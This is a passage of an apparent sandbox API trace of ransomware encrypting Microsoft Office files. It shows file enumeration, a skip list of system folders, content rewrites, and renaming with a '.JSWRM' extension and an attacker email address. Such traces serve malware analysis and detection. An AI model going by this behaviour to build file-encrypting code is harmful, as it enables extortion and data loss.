(normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bzcd98sp.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.660] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=25108) returned 1 [0140.660] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.660] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x6210, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x6210, lpOverlapped=0x0) returned 1 [0140.663] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.663] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x6210, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x6210, lpOverlapped=0x0) returned 1 [0140.664] CloseHandle (hObject=0x238) returned 1 [0140.664] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BZCD98SP.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bzcd98sp.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BZCD98SP.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bzcd98sp.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.665] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21889f0d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21889f0d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21889f0d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3caa2, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="BZCRD98.POC", cAlternateFileName="")) returned 1 [0140.665] lstrcmpiW (lpString1="BZCRD98.POC", lpString2=".") returned 1 [0140.665] lstrcmpiW (lpString1="BZCRD98.POC", lpString2="..") returned 1 [0140.665] lstrcmpiW (lpString1="BZCRD98.POC", lpString2="...") returned 1 [0140.665] lstrcmpiW (lpString1="BZCRD98.POC", lpString2="windows") returned -1 [0140.665] lstrcmpiW (lpString1="BZCRD98.POC", lpString2="recovery") returned -1 [0140.665] lstrcmpiW (lpString1="BZCRD98.POC", lpString2="perflogs") returned -1 [0140.665] lstrcmpiW (lpString1="BZCRD98.POC", lpString2="documents and settings") returned -1 [0140.665] lstrcmpiW (lpString1="BZCRD98.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.665] lstrcmpiW (lpString1="BZCRD98.POC", lpString2="system volume information") returned -1 [0140.665] lstrcmpiW (lpString1="BZCRD98.POC", lpString2="msocache") returned -1 [0140.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BZCRD98.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BZCRD98.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BZCRD98.POC", lpUsedDefaultChar=0x0) returned 11 [0140.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BZCRD98.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BZCRD98.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BZCRD98.POC", lpUsedDefaultChar=0x0) returned 11 [0140.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BZCRD98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bzcrd98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.666] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=248482) returned 1 [0140.666] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.666] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0140.679] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.679] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0140.679] CloseHandle (hObject=0x238) returned 1 [0140.679] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BZCRD98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bzcrd98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BZCRD98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bzcrd98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.680] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21863ca8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21863ca8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x218b0166, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x148f52, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="CALENDAR.DPV", cAlternateFileName="")) returned 1 [0140.680] lstrcmpiW (lpString1="CALENDAR.DPV", lpString2=".") returned 1 [0140.680] lstrcmpiW (lpString1="CALENDAR.DPV", lpString2="..") returned 1 [0140.680] lstrcmpiW (lpString1="CALENDAR.DPV", lpString2="...") returned 1 [0140.680] lstrcmpiW (lpString1="CALENDAR.DPV", lpString2="windows") returned -1 [0140.680] lstrcmpiW (lpString1="CALENDAR.DPV", lpString2="recovery") returned -1 [0140.681] lstrcmpiW (lpString1="CALENDAR.DPV", lpString2="perflogs") returned -1 [0140.681] lstrcmpiW (lpString1="CALENDAR.DPV", lpString2="documents and settings") returned -1 [0140.681] lstrcmpiW (lpString1="CALENDAR.DPV", lpString2="$RECYCLE.BIN") returned 1 [0140.681] lstrcmpiW (lpString1="CALENDAR.DPV", lpString2="system volume information") returned -1 [0140.681] lstrcmpiW (lpString1="CALENDAR.DPV", lpString2="msocache") returned -1 [0140.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALENDAR.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALENDAR.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALENDAR.DPV", lpUsedDefaultChar=0x0) returned 12 [0140.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALENDAR.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALENDAR.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALENDAR.DPV", lpUsedDefaultChar=0x0) returned 12 [0140.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.681] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CALENDAR.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\calendar.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.682] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1347410) returned 1 [0140.682] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.682] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0140.695] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.695] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0140.696] CloseHandle (hObject=0x238) returned 1 [0140.696] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CALENDAR.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\calendar.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CALENDAR.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\calendar.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.697] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x218b0166, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x218b0166, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x218b0166, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2614, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="CALENDAR.XML", cAlternateFileName="")) returned 1 [0140.697] lstrcmpiW (lpString1="CALENDAR.XML", lpString2=".") returned 1 [0140.697] lstrcmpiW (lpString1="CALENDAR.XML", lpString2="..") returned 1 [0140.697] lstrcmpiW (lpString1="CALENDAR.XML", lpString2="...") returned 1 [0140.697] lstrcmpiW (lpString1="CALENDAR.XML", lpString2="windows") returned -1 [0140.697] lstrcmpiW (lpString1="CALENDAR.XML", lpString2="recovery") returned -1 [0140.697] lstrcmpiW (lpString1="CALENDAR.XML", lpString2="perflogs") returned -1 [0140.697] lstrcmpiW (lpString1="CALENDAR.XML", lpString2="documents and settings") returned -1 [0140.697] lstrcmpiW (lpString1="CALENDAR.XML", lpString2="$RECYCLE.BIN") returned 1 [0140.697] lstrcmpiW (lpString1="CALENDAR.XML", lpString2="system volume information") returned -1 [0140.697] lstrcmpiW (lpString1="CALENDAR.XML", lpString2="msocache") returned -1 [0140.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALENDAR.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALENDAR.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALENDAR.XML", lpUsedDefaultChar=0x0) returned 12 [0140.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALENDAR.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALENDAR.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALENDAR.XML", lpUsedDefaultChar=0x0) returned 12 [0140.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.697] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CALENDAR.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\calendar.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.698] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9748) returned 1 [0140.698] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.698] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2610, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2610, lpOverlapped=0x0) returned 1 [0140.700] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.700] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2610, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2610, lpOverlapped=0x0) returned 1 [0140.701] CloseHandle (hObject=0x238) returned 1 [0140.701] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CALENDAR.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\calendar.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CALENDAR.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\calendar.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.702] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21889f0d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21889f0d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x218b0166, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x329e0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="CALHM.POC", cAlternateFileName="")) returned 1 [0140.702] lstrcmpiW (lpString1="CALHM.POC", lpString2=".") returned 1 [0140.702] lstrcmpiW (lpString1="CALHM.POC", lpString2="..") returned 1 [0140.702] lstrcmpiW (lpString1="CALHM.POC", lpString2="...") returned 1 [0140.702] lstrcmpiW (lpString1="CALHM.POC", lpString2="windows") returned -1 [0140.702] lstrcmpiW (lpString1="CALHM.POC", lpString2="recovery") returned -1 [0140.702] lstrcmpiW (lpString1="CALHM.POC", lpString2="perflogs") returned -1 [0140.702] lstrcmpiW (lpString1="CALHM.POC", lpString2="documents and settings") returned -1 [0140.702] lstrcmpiW (lpString1="CALHM.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.702] lstrcmpiW (lpString1="CALHM.POC", lpString2="system volume information") returned -1 [0140.702] lstrcmpiW (lpString1="CALHM.POC", lpString2="msocache") returned -1 [0140.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALHM.POC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0140.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALHM.POC", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALHM.POC", lpUsedDefaultChar=0x0) returned 9 [0140.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALHM.POC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0140.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALHM.POC", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALHM.POC", lpUsedDefaultChar=0x0) returned 9 [0140.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CALHM.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\calhm.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.703] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=207328) returned 1 [0140.703] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.703] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0140.715] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.715] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0140.716] CloseHandle (hObject=0x238) returned 1 [0140.716] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CALHM.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\calhm.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CALHM.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\calhm.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.717] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21889f0d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21889f0d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x218d63bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a6da2, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="CALNDR98.POC", cAlternateFileName="")) returned 1 [0140.718] lstrcmpiW (lpString1="CALNDR98.POC", lpString2=".") returned 1 [0140.718] lstrcmpiW (lpString1="CALNDR98.POC", lpString2="..") returned 1 [0140.718] lstrcmpiW (lpString1="CALNDR98.POC", lpString2="...") returned 1 [0140.718] lstrcmpiW (lpString1="CALNDR98.POC", lpString2="windows") returned -1 [0140.718] lstrcmpiW (lpString1="CALNDR98.POC", lpString2="recovery") returned -1 [0140.718] lstrcmpiW (lpString1="CALNDR98.POC", lpString2="perflogs") returned -1 [0140.718] lstrcmpiW (lpString1="CALNDR98.POC", lpString2="documents and settings") returned -1 [0140.718] lstrcmpiW (lpString1="CALNDR98.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.718] lstrcmpiW (lpString1="CALNDR98.POC", lpString2="system volume information") returned -1 [0140.718] lstrcmpiW (lpString1="CALNDR98.POC", lpString2="msocache") returned -1 [0140.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALNDR98.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALNDR98.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALNDR98.POC", lpUsedDefaultChar=0x0) returned 12 [0140.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALNDR98.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CALNDR98.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CALNDR98.POC", lpUsedDefaultChar=0x0) returned 12 [0140.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.718] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CALNDR98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\calndr98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.719] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1732002) returned 1 [0140.719] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.719] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0140.733] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.733] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0140.733] CloseHandle (hObject=0x238) returned 1 [0140.733] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CALNDR98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\calndr98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CALNDR98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\calndr98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.734] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x218d63bb, ftCreationTime.dwHighDateTime=0x1d327e8, 